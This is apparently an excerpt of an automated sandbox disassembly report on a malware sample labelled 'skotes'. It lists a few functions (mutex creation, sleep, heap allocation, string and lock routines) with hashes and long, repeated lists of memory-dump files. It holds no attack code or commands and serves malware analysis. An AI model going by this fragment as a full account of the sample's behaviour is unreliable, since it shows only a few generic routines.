Associated: 00000002.00000002.1733668382.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733711343.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733725448.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733801787.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733819836.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733837527.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733855671.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733870196.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733886712.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733906035.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733925064.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733942500.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733959277.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733978232.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733995446.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734013456.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734027180.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734027180.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734205050.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734227506.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734245529.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734263856.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734280289.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734299274.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734314422.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 06fa124b420677a2de7dd8acf122fb7ef038e18096c6011f2a7cf8dad06432ae
Instruction ID: 4bba39fccae8505e19f5b3285912fc246843af9000721ff30f257198a22235dc
Opcode Fuzzy Hash: 06fa124b420677a2de7dd8acf122fb7ef038e18096c6011f2a7cf8dad06432ae
Instruction Fuzzy Hash: 492172307492018AEB24E77B999E73DB365DFC1302F244A15EF44D63D2CB7645488397

Function 0095A34F Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0095A963
CreateMutexA.KERNELBASE(00000000,00000000,009B3254), ref: 0095A981

Memory Dump Source

Source File: 00000002.00000002.1732633839.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000002.00000002.1732564170.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732633839.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732693634.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732706424.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732720681.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732733544.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732746790.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732836871.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732857227.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732874870.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732887434.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732899950.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732899950.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732937641.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732952071.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732965883.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732978646.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733004973.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733019299.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733056403.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733104350.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733283750.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733296990.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733327887.0000000000B70000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733376160.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733449133.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733521278.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733551502.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733565403.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733591961.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733668382.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733711343.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733725448.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733801787.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733819836.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733837527.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733855671.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733870196.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733886712.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733906035.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733925064.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733942500.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733959277.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733978232.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733995446.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734013456.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734027180.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734027180.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734205050.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734227506.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734245529.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734263856.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734280289.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734299274.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734314422.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: c14f8c69ab960d8d7f008534643e017918ae81ba1cff0d8f174c6e0e8c13b5f9
Instruction ID: 5e1c04d87c8b161b898c35b93a3cf0f52e57ebea0842f9aba3a96515a1a07262
Opcode Fuzzy Hash: c14f8c69ab960d8d7f008534643e017918ae81ba1cff0d8f174c6e0e8c13b5f9
Instruction Fuzzy Hash: F921D6317442018BEB08DB2DED9972CBB66DBC1322F20831DE8188B6D1C7368A888756

Function 0098D82F Relevance: 1.5, APIs: 1, Instructions: 40
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0098A813,00000001,00000364,00000006,000000FF,?,0098EE3F,?,00000004,00000000,?,?), ref: 0098D871

Memory Dump Source

Source File: 00000002.00000002.1732633839.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000002.00000002.1732564170.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732633839.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732693634.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732706424.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732720681.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732733544.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732746790.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732836871.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732857227.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732874870.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732887434.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732899950.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732899950.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732937641.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732952071.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732965883.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732978646.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733004973.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733019299.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733056403.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733104350.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733283750.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733296990.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733327887.0000000000B70000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733376160.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733449133.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733521278.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733551502.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733565403.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733591961.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733668382.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733711343.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733725448.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733801787.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733819836.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733837527.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733855671.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733870196.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733886712.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733906035.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733925064.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733942500.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733959277.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733978232.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733995446.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734013456.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734027180.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734027180.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734205050.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734227506.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734245529.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734263856.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734280289.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734299274.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734314422.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: b67403444cf6167f7e555480f6a54c6f897937fb6b60342e7ea323196c0ae238
Instruction ID: 7f7b49468bf7a155cbb3cfac34155b929dca7cbc2b4d3c32699fd34522cea2e7
Opcode Fuzzy Hash: b67403444cf6167f7e555480f6a54c6f897937fb6b60342e7ea323196c0ae238
Instruction Fuzzy Hash: 0FF0823260722566EB217A769D05B6B775DDF86770F198521BD09A73C1DA24EC0087E0

Non-executed Functions

Function 0098CBDF Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0098CC66

Memory Dump Source

Source File: 00000002.00000002.1732633839.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000002.00000002.1732564170.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732633839.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732693634.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732706424.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732720681.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732733544.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732746790.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732836871.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732857227.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732874870.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732887434.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732899950.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732899950.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732937641.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732952071.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732965883.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732978646.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733004973.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733019299.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733056403.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733104350.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733283750.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733296990.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733327887.0000000000B70000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733376160.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733449133.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733521278.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733551502.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733565403.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733591961.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733668382.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733711343.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733725448.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733801787.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733819836.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733837527.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733855671.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733870196.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733886712.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733906035.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733925064.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733942500.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733959277.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733978232.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733995446.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734013456.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734027180.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734027180.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734205050.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734227506.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734245529.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734263856.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734280289.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734299274.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734314422.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
Instruction ID: 600cdfe0eb3a72049971f59de4e2ffbfd6c3fcbb15805a515f39c89af8d3dab8
Opcode Fuzzy Hash: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
Instruction Fuzzy Hash: 60B148B2D046459FDB11EF28C881BBEBBE9EF95340F14856AE855EB382D6349D01CB70

Function 00952EC0 Relevance: 6.3, APIs: 4, Instructions: 272COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00952F5F
__Mtx_unlock.LIBCPMT ref: 00952FCC
__Mtx_unlock.LIBCPMT ref: 009530F5
__Mtx_unlock.LIBCPMT ref: 0095319B

Memory Dump Source

Source File: 00000002.00000002.1732633839.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000002.00000002.1732564170.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732633839.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732693634.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732706424.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732720681.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732733544.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732746790.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732836871.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732857227.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732874870.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732887434.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732899950.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732899950.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732937641.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732952071.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732965883.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732978646.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733004973.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733019299.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733056403.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733104350.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733283750.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733296990.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733327887.0000000000B70000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733376160.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733449133.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733521278.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733551502.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733565403.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733591961.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733668382.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733711343.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733725448.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733801787.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733819836.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733837527.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733855671.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733870196.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733886712.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733906035.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733925064.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733942500.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733959277.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733978232.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733995446.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734013456.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734027180.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734027180.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734205050.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734227506.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734245529.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734263856.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734280289.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734299274.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734314422.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: Mtx_unlock
String ID:
API String ID: 1418687624-0
Opcode ID: ed4d905ddcb2a76dc79fe9216afbcc24ada544a5f0214588b872425e55ed24a5
Instruction ID: 148e7deb3509af0e9ac742ca3ffadfe9ed402fc483fa249bc3e80ff155653727
Opcode Fuzzy Hash: ed4d905ddcb2a76dc79fe9216afbcc24ada544a5f0214588b872425e55ed24a5
Instruction Fuzzy Hash: 24A1FFB0A05715AFDB20DB76C94476AB7A8FF55361F048129FC15D7281EB31EA08CBD1

